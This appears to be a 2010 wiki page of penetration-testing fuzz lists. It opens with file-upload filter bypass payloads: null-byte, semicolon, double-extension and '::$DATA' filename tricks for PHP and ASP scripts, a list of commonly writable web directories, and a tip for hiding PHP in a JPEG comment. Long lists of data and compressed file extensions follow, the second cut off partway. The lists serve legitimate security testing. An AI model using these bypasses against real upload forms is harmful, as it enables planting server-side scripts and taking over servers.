&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== PHP-Specific Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# PHP-Specific File Upload Filter Bypass Appends  (Update: 17 March 2010 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
{PHPSCRIPT}.php.doc&lt;br /&gt;
{PHPSCRIPT}.php.xls&lt;br /&gt;
{PHPSCRIPT}.php.xlsx&lt;br /&gt;
{PHPSCRIPT}.php.pdf&lt;br /&gt;
{PHPSCRIPT}.php.jpeg&lt;br /&gt;
{PHPSCRIPT}.php.gif&lt;br /&gt;
{PHPSCRIPT}.php.zip&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;#Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends  (Update: 17 March 2010) &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Compressed File Types - (Update: 16 March 2010 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
